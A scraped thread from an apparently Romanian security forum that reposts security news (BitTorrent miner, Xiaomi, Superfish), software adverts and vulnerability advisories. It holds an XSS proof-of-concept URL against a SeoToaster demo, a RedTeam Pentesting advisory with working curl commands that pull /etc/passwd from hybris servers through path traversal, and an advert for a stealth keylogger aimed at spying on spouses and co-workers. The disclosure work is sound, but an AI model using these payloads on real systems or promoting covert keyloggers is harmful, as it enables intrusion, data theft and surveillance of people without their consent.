Our policy is that these offers are strictly optional and we have never done a silent install; in fact, we built our installer technology to make silent installs impossible. The offers we choose and how we present them are something we strive to get right, and we think we’ve been mostly successful over the last four years.” “That being said – from the feedback we’ve received, it is clear that we misjudged how users would react to this offer; this software is truly different from our previous offers and therefore deserves special attention. For this, we unequivocally apologize to our affected users.” The ?Torrent client were however not happy with the apology. A poster on the forum demanded the BitTorrent should permanently stop such installations while another asked BitTorrent to consider the damage it may have cost, “I may ask that for the next set of offers that full testing be done to ensure that zero threats of malware/adware/spyware is given free reign over the client’s system. Meaning, a system set up that a normal person would use with a normal AV program. Once the package is installed, an array of mal/spy/adware cleaners are put to work to see how deep these packages go and how they are treated by the cleaners. This situation would pale in comparision if a genuine threat was unleashed by accident.” SURSA: BitTorrent apologizes for Epic Scale crypto-miner installed with ?Torrent torrent client with after user outrage Se pare ca nu e de la adware si alte programe intalate din greseala fiindca uiti sau nu vezi sa dai uncheck atunci cand instalezi utorrent.
  16. Recently a mobile-security firm Bluebox claimed that the brand new Xiaomi Mi4 LTE comes pre-installed with spyware/adware and a "forked" vulnerable version of Android operating system on top of it, however, the company denies the claim. Xiaomi, which is also known as Apple of China, provides an affordable and in-budget smartphones with almost all features that an excellent smartphone provides. On 5th March, when Bluebox researchers claimed to have discovered some critical flaws in Mi4 LTE smartphone, Xiaomi issued a statement to The Hacker News claiming that "There are glaring inaccuracies in the Bluebox blog post" and that they are investigating the matter. RESEARCHERS GET TROLLED BY CHINESE SELLERS Now, Xiaomi responded to Bluebox Labs by preparing a lengthy denial to their claims and said the new Mi4 smartphone purchased by Bluebox team in China (known as the birthplace of fake smartphones) was not an original Xiaomi smartphone but a counterfeit product. This means, Mi4 LTE smartphone owned by Bluebox are tempered by the local Chinese shops itself. What the Heck! Chinese get trolled by Chinese. XIAOMI DECLINES BLUEBOX CLAIMS Xiaomi provided a detailed step-by-step explanation on each and every fact and figure: Hardware: Xiaomi hardware experts have analysed the internal device photos provided to the company by Bluebox and confirmed that the physical hardware is markedly different from the original Mi 4 smartphone. IMEI number: Xiaomi after-sales team has confirmed that the IMEI on the device from Bluebox is a cloned IMEI number which has been previously used on other counterfeit Xiaomi devices in China. Software: Xiaomi MIUI team has also confirmed that the software installed on the device from Bluebox is not an official Xiaomi MIUI build. The company assured its customers that their devices neither come rooted, nor have any malware pre-installed. Contrary to Bluebox claims, the company also assured its customers that the MIUI used in their products is true Android, which means MIUI follows exact Google's Android CDD (Compatibility Definition Document), and passes all Android CTS tests to make sure a given device is fully Android compatible. Declining to Bluebox finding, Xiaomi released the following statement in an email to The Hacker News: Source
  17. Product Description The top 1 watermark software, provide professional image protection solutions for your online photos. How Do You Know that Your Photos Are Secure? If you are sharing your photos on the internet, you are at the risk of losing them. Someone would take the photos for their own using, or malicious revised, you might never even know. Watermark Software is professional watermarking program for protecting online photo’s copyright. It can add text watermark, image watermark, logo and signature to photos without unauthorized using. Watermark Software also supports batch mode. And the process of adding watermark to 500 pictures will be in less than 1 minute. Text Watermark A common way to protect images with adding your name, nickname, signature, date to photo. Image Watermark Allows you to add image to preventing others from removing watermark and stealing photo. There are lot of free watermarks Pretty Frames Watermark Software provides many picture frames that you can add and edit the frames to retouch your photo at your will. Make QR Code as Watermark A QR code is a square black pattern like a Barcode which contains encoded information and can be scanned to read that information. Watermark Software allows you put QR code as watermark on you photo to show more extended information. EXIF Editor It’s invisible watermark embed your image file, also a strong proof of copyright Watermark tiling for strong protection For some special purposes, you need to protect your shared photos to avoid copy and unauthorized using. However, we can’t prevent from the reproduction and dissemination on the internet. Tiled watermark provides the strong protection for your photo display. Photo Resize Two modes Pixel and Percentage for various photo sizes, optimize the quality automatically Batch Rename Powerful template let you rename hundreds of files immediately Photo Cropping Removing unwanted area of photo, enlarge the important area of photo and make your photo smaller than original Support All of Photo Formats Add photos with different formats to watermark software, it will process them at once Amazing Batch Process Speed – Faster Than Ever Still waste a whole day to add watermark to batches of photos? Get free again with Watermark Software! - High Efficiency – Batch Watermark / Batch Resize / Batch Rename / Batch Editing and more; - Top speed – Watermark all your travel, party photos in one operation, batch watermark over 300 photos within 1 minute; - Smart fit – Intelligently adjust watermark’s size/place to fit different size/format pictures; Create Customized Templates for Fast Watermarking We are tired of doing the same thing repeatedly! Your own custom watermark style can be saved as template in your computer, just load the template to restore your watermark project. No need to waste your precious time to do it again. Exclusive Feature – Upload all of processed images to your web server automatically via FTP. Simplify your job – If you want to add watermark to 500 photos for your website/blog/online storage, just run Watermark Software and then enjoy a cup of coffee, everything will be done when you get back. Product Homepage Here -> Download <-Deal Expires in: EXPIRED!
  18. X1.

    Salut

    Well glad to be here, even though i dont know nor understand Romanian. Hope you wont mind it, let me introduce my self I'm a HipHop addict, love penetration, love linux, and hacking. I love hardware with the same love as software . Love gadgets Pi, drones gGlass anything that you can have fun . Hope to contribute to the community and share and learn something new. Peace
  19. # Affected software: http://demo.seotoaster.com # Type of vulnerability: clickjacking # Version: E-Commerce 2.2.0 # URL: http://www.seotoaster.com/ # Discovered by: Provensec # Website: http://www.provensec.com # Description:Free SEO Software & CMS: All in One # Proof of concept seo toaster search filed was vuln to xss http://demo.seotoaster.com/search-results.html?search=%3C%2Fscript%3E%3Cscript%3Ealert%28/provensec/%29%3C%2Fscript%3E Source
  20. Google yesterday announced that it would expand its browser security efforts with a new warning in Chrome about unwanted software to caution users about accessing sites that are known to encourage unsafe downloads. The Mountain View, Calif., search and browsing giant has invested serious resources into its safe browsing features over the past several years. The company revamped its malware and bad SSL certificate warnings last year following a pair of studies seeking to determine how browser-based warnings could effectively stop users from clicking through to potentially dangerous content. To this point, a user would trigger Google’s unwanted software warning in Chrome just as he attempted to download sketchy content. Now the warnings kick in as the user attempts to browser directly to a site or in Google search results leading to the site. “If you’re a site owner, we recommend that you register your site with Google Webmaster Tools,” wrote Google software engineer, Lucas Ballard. “This will help you stay informed when we find something on your site that leads people to download unwanted software, and will provide you with helpful tips to resolve such issues.” Early last year, Google ruffled some feathers by announcing it would block malicious file downloads by default in its Chrome browser. While some expressed concern about Google acting as a gatekeeper for acceptable content, the company ultimately went forward with the move. Yesterday’s announcement takes Google’s year-old decision one step further, allowing the company to encourage users not to visit certain sites as opposed to encouraging them not to download certain files. Later in 2014, the company expanded its definition of unwanted software to include programs that purport to be something they are not or make unwanted changes to the user’s browser. Source
  21. Pe 4 martie 2015, pasionatii de tehnologii open source vor face schimb de experienta si vor relationa in cadrul unei conferinte tehnice dedicate Brian King, European Community Manager al Mozilla, este cap de afis la conferinta Make Open Source Software (MOSS) organizata de ANIS – Asociatia Patronala a Industriei de Software si Servicii, in colaborare cu Intel Romania Software Development Center. Evenimentul are loc la Biblioteca Centrala din Universitatea Politehnica Bucuresti, pe 4 martie. Timp de o zi, dezvoltatori, manageri de echipe sau proiecte, studenti si profesori interesati de tehnologiile open source sunt asteptati sa ia parte la prezentari si discutii tehnice aprofundate despre masini virtuale, Internet of Things, implementari la scara larga prin Puppet Labs, studii de caz concrete despre scalabilitatea in Azure Cloud si demonstratii live. Agenda detaliata este disponibila pe site-ul evenimentului – Agenda – MOSS. “Suntem bucurosi sa organizam conferinta Make Open Source Software, in parteneriat cu Asociatia Patronala a Industriei de Software si Servicii. Va fi un prilej bun de a-i aduce laolalta pe profesionistii din sfera Open Source din Romania”, a declarat Mihai Constantin-Pau, Engineering Manager, Intel Open Source Technology Center din cadrul Intel Romania Software Development Center. La eveniment va sustine o prezentare despre debutul open source in Romania si dezvoltarea GNU Interactive Tools – Andrei Pitis, Presedinte ANIS si unul dintre primii contribuitori open source din Romania, acum 20 de ani. Studentii beneficiaza de o reducere de 50%, fiind incurajati sa interactioneze in comunitate, iar pentru companiile care doresc inscrierea mai multor persoane sunt disponibile pachete de grup cu discount. Biletele se pot achizitiona online, direct de pe site: Register – MOSS. -> Sursa: http://www.faravirusi.com/2015/02/20/18062/
  22. Do you want to know what your buddy or co-workers are doing online? Or perhaps you want to check up on your children or spouse and know what they are doing on the computer? With Perfect Keylogger it is possible in just 2 minutes! This program runs on the installed computer, fully hidden from its users, and logs everything that is typed in a protected file. Install Perfect Keylogger and find out the Truth! Perfect Keylogger is a new generation keylogger which is virtually undetectable. It was created as an alternative to very expensive commercial products like Spector Keylogger or E-Blaster. It has a similar functionality, but is significantly easier to use. Complex internal mechanisms are hidden from the user behind the friendly interface. You can install Keylogger and use it immediately without messing with settings. Perfect Keylogger is a popular award-winning tool, translated into 20+ languages. It lets you record all keystrokes, the time they were made and the application where they were entered. It works in the absolutely stealth mode. Stealth mode means that no button or icon is present in the Task Bar, and no process title is visible in the Task Manager list. Also, Perfect Keylogger can carry out visual surveillance. It periodically makes screenshots in invisible mode and stores the compressed images on the disk so you can review them later. Our keylogger has unique remote installation feature. You can create a pre-configured package for instant and stealth installation on the target computer. New Smart Rename feature lets you to rename all keylogger's executable files and registry entries using one keyword! One of the most powerful features of Perfect Keylogger is its advanced Keyword Detection and Notification. Create a list of "on alert" words or phrases and keylogger will continually monitor keyboard typing, URLs and web pages for these words or phrases. You tell Perfect Keylogger which phrases to watch out for - for example, "sex," "porno", "where do you live," "are your parents home," "is your wife sleeping," "I hate my boss" - whatever you decide to include. When a keyword is detected, Perfect Keylogger makes screenshot and immediately sends email notification to you. Perfect Keylogger was the first keylogging software solution which can be absolutely invisible in Windows 7/Vista/XP Task Manager! Now we are glad to offer the full Windows 64 bit support - you won't find it in most of competition products. The program lets you easily view the log file, displaying the title of the window (for example, title: "John (Online) - Message Session" in Yahoo IM), the date and time of the action and the contents of the typed matter itself. Unlike some other spy software products, Perfect Keylogger does not send any information to our company. Only you will receive the log files. We guarantee absolute privacy, high quality product and technical support - that's why we have thousands of satisfied customers. You pay once, all updates are free. For example, customers, who bought the first version in 2002, now can get the advanced latest version for free! You can be sure that you will always have the most modern spy software! We have to tell you, that such a software is very complex and only 2-3 products on the market, including this, have a good quality to use them effectively. Do not use a cheap or a free monitoring software! You can get an important data leaks or the system crashes! We can guarantee your system safety with our product. Perfect Keylogger is available in three editions: full version, full version remote edition and basic edition. Choose the functionality you need. Supported platforms for Perfect Keylogger: Windows 2000, Windows XP (32-bit and x64), Windows Server 2003/2008, Windows Vista (32-bit and x64), Windows 7, Windows 8 / 8.1 (32-bit and x64); Older versions of Windows are supported with older builds of the product. Minimum requirements for Perfect Keylogger: Windows XP or later (older versions are also available) Home Page - Perfect Keylogger for Windows 8/7/XP - Remote Monitoring Software. Download invisible keylogger now. Free trial Sursa: BlazingTools Perfect Keylogger Remote Edition 1.93 PS: Nu este verificat fiindca nu este pus de mine, eu doar am gasit programul pe acest site. Am mai folosit acest site si vad ca nu sunt virusi, dar nu strica sa verificati. Apropo, care este mai bun: asta sau Ardamax ?
  23. Advisory: Directory Traversal and Arbitrary File Disclosure in hybris Commerce Software Suite During a penetration test, RedTeam Pentesting discovered a Directory Traversal vulnerability in hybris Commerce software suite. This vulnerability allows attackers to download arbitrary files of any size from the affected system. Details ======= Product: hybris Commerce Software Suite Affected Versions: Release 5.3: <= 5.3.0.1 Release 5.2: <= 5.2.0.3 Release 5.1.1: <= 5.1.1.2 Release 5.1: <= 5.1.0.1 Release 5.0.4: <= 5.0.4.4 Release 5.0.3: <= 5.0.3.3 Release 5.0.0: <= 5.0.0.3 Fixed Versions: Release 5.3: 5.3.0.2 Release 5.2: 5.2.0.4 Release 5.1.1: 5.1.1.3 Release 5.1: 5.1.0.2 Release 5.0.4: 5.0.4.5 Release 5.0.3: 5.0.3.4 Release 5.0.0: 5.0.0.4 Vulnerability Type: Directory Traversal, Arbitrary File Disclosure Security Risk: high Vendor URL: http://www.hybris.com/ Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-016 Advisory Status: published CVE: CVE-2014-8871 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8871 Introduction ============ "hybris delivers a commerce software suite that is best in class, helping a company execute all its direct selling processes and present a single view and a unified experience to all its customers." (from the vendor's homepage) More Details ============ Webshops based on hybris may use an image retrieval system where images are identified by a URL parameter named "context" rather than a file name. When this system is used, images can be referenced e.g. like the following: <img src="/medias/image.jpg?context=bWFzdGVyfHJvb3R8MTIzNDV8aW1hZ2UvanBl Z3w3NDE1Njg3MzYxMTcyLmpwZ3xlM2IwYzQ0Mjk4ZmMxYzE0OWFmYmY0Yzg5OTZmYjkyNDI3 YWU0MWU0NjQ5YjkzNGNhNDk1OTkxYjc4NTJiODU1" alt="[...]" width="200" /> Changing the file name part of the URL from "image.jpg" to e.g. "redteam.jpg" reveals that not the file name part of the URL, but the value of the parameter "context" is used to select the desired file. A closer look at the parameter shows that its value is encoded as Base64. Decoding it reveals a pipe-separated data structure which includes a file size (third value), a file name (fifth value) and a SHA-256 hash (sixth value): $ echo -n "bWFzdGVyfHJvb3R8MTIzNDV8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpw\ Z3xlM2IwYzQ0Mjk4ZmMxYzE0OWFmYmY0Yzg5OTZmYjkyNDI3YWU0MWU0NjQ5YjkzNGNhNDk\ 1OTkxYjc4NTJiODU1" | base64 -d master|root|12345|image/jpeg|7415687361172.jpg|e3b0c44298fc1c149afbf4c89 96fb92427ae41e4649b934ca495991b7852b855 During the penetration test many parameters were inspected and it turned out that the SHA-256 hash is used to reference a particular version of the file, and can be replaced by a dash ("-") character, which always returns the latest version. The example request can be modified and requested with curl as follows: $ echo -n "master|root|12345|image/jpeg|7415687361172.jpg|-" | base64 bWFzdGVyfHJvb3R8MTIzNDV8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3wt $ curl -I http://www.example.com/medias/redteam?context=bWFzdGVyfHJvb3R\ 8MTIzNDV8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3wt It was verified that the file name (fifth) value is vulnerable to directory traversal. This enables attackers to retrieve the contents of other files from the server's filesystem by using sequences of "../". The following HTTP request for example delivers the contents of the file "/etc/passwd": $ echo -n "master|root|12345|text/plain|../../../../../../etc/passwd|-"\ | base64 -w0 bWFzdGVyfHJvb3R8MTIzNDV8dGV4dC9wbGFpbnwuLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFz c3dkfC0= $ curl http://www.example.com/medias/redteam?context=bWFzdGVyfHJvb3R8MT\ IzNDV8dGV4dC9wbGFpbnwuLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dkfC0 root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh [...] The size included in the third field of the data structure is used to limit the number of bytes returned for a file. As it can be modified by attackers, files of any size with arbitrary content can be downloaded, provided the path to the file on the server is known. This enables attackers to read, among others, the environment of the current process at /proc/self/environ and the list of memory maps including the full paths to loaded libraries at /proc/self/maps. This way, knowledge about a particular instance of hybris can be gathered. Afterwards it is possible to access configuration files like "local.properties" and the log files for shop orders which also contain the current session-IDs of users. Furthermore, the Java bytecode of hybris can be downloaded and decompiled. Proof of Concept ================ ------------------------------------------------------------------------ FILENAME=/etc/passwd curl https://www.example.com/medias/redteam?context=$(base64 -w0 <<< \ "master|root|200000000|text/plain|../../../../../..${FILENAME}|-") ------------------------------------------------------------------------ Workaround ========== Implement a new filter which validates file names and insert this filter before hybris' own MediaFilter. The new filter should return an error when a file outside the media directory is requested. Fix === Upgrade to a fixed hybris version or apply the vendor's hot fix. Security Risk ============= This vulnerability can be used to download files from the file system of the server. This includes, among others, configuration files and the hybris order logfile, which contains sensitive data. Therefore, the vulnerability poses a high risk. Timeline ======== 2014-10-08 Vulnerability identified 2014-10-08 Customer notified vendor 2014-10-29 Vendor released fixed version 2014-11-11 CVE number requested 2014-11-12 Vendor requests more time to notify their customers 2014-11-14 CVE number assigned 2014-12-08 Vendor again requests more time to notify customers 2015-01-12 Vendor notifies customers again, agrees to release advisory on 2015-02-18 2015-02-17 Vendor requests more time to notify customers for the 3rd time, RedTeam Pentesting declines 2015-02-18 Advisory released RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at https://www.redteam-pentesting.de. -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen Source
  24. A pretty shocking thing came to light this evening – Lenovo is installing adware that uses a “man-in-the-middle” attack to break secure connections on affected laptops in order to access sensitive data and inject advertising. As if that wasn’t bad enough they installed a weak certificate into the system in a way that means affected users cannot trust any secure connections they make – TO ANY SITE. We trust our hardware manufacturers to build products that are secure. In this current climate of rising cybercrime, if you cant trust your hardware manufacturer you are in a very difficult position. That manufacturer has a huge role to play in keeping you safe – from releasing patches to update software when vulnerabilities are found to behaving in a responsible manor with the data the collect and the privileged access they have to your hardware. When bad guys are able to get into the supply chain and install malware it is devastating. Often users find themselves with equipment that is compromised and are unable to do anything about it. When malware is installed with the access a manufacturer has it buries itself deep inside the system often with a level of access that often takes it beyond the reach of antivirus or other countermeasures. This is why it is all the more disappointing – and shocking – to find a manufacturer doing this to its customers voluntarily. Lenovo has partnered with a company called Superfish to install advertising software on it’s customer’s laptops. Under normal circumstances this would not be cause for concern. However Superfish’s software has quite a reputation. It is a notorious piece of “adware”, malicious advertising software. A quick search on Google reveals numerous links for pages containing everything from software to remove Superfish to consumers complaining about the presence of this malicious advertising tool. Superfish Features: Hijacks legitimate connections. Monitors user activity. Collects personal information and uploads it to it’s servers Injects advertising in legitimate pages. Displays popups with advertising software Uses man-in-the-middle attack techniques to crack open secure connections. Presents users with its own fake certificate instead of the legitimate site’s certificate. This presents a security nightmare for affected consumers. Superfish replaces legitimate site certificates with its own in order to compromise the connections so it can install its adverts. This means that anyone affected by this adware cannot trust any secure connections they make. Users will not be notified if the legitimate site’s certificate has been tampered with, has expired or is bogus. In fact they now have to rely on Superfish to perform that check for them. Which it does not appear to do. Because Superfish uses the same certificate for every site it would be easy for another hostile actor to leverage this and further compromise the user’s connections. Superfish uses a deprecated SHA1 certificate. SHA1 has been replaced by SHA-256 because attacks against SHA1 are now feasible with ordinary computing hardware. This is insult on top of injury. Not only are they compromising peoples SSL connections but they are doing it in the most cavalier, insecure way possible. Even worse, they use crackable 1024-bit RSA! The user has to trust that this software which has compromised their secure connections is not tampering with the content, or stealing sensitive data such as usernames and passwords. If this software or any of its control infrastructure is compromised, an attacker would have complete and unrestricted access to affected customers banking sites, personal data and private messages. Below is a photo showing Superfish on an affected laptop presenting a fake certificate instead of the legitimate “Bank of America” certificate. As you can see the user is presented with the fake Superfish certificate instead of the legitimate BoA certificate. The only way a user would know this has happened is if they check the certificate’s details. Something most ordinary users are unlikely to do to a certificate which to all other appearances is valid and secure. As mentioned above the certificate used by Superfish is a deprecated SHA1 certificate that uses 1024-bit RSA. This is particularly obnoxious because they have installed into the system certificates as an unrestricted trusted root certificate. To put it into context they gave it the same level of trust and authority as Microsoft’s own root certificate. Users affected by this can go to any site on the internet, and so long as it presents this certificate they will be fooled into thinking they have a secure connection. Since this certificate uses SHA1 it is feasible that an attacker could break it and hijack it. This means an attacker could create a bogus certificate that every one of these users would trust. This is unbelievably ignorant and reckless of them. Its quite possibly the single worst thing I have seen a manufacturer do to its customer base. At this point I would consider every single one of these affected laptops to be potentially compromised and would reinstall them from scratch. Lenvo’s response? Typical of companies caught with their hand in the cookie jar, they try to play it down while at the same time saying they have disabled it until it can be “fixed”: https://forums.lenovo.com/t5/Lenovo-P-Y-and-Z-series/Lenovo-Pre-instaling-adware-spam-Superfish-powerd-by/m-p/1863174#M79882 However its hard to see how they could “fix” this software. It’s core functionality undermines the security of SSL rendering the last decade or so of work making the web secure completely irrelevant. Source
×
×
  • Create New...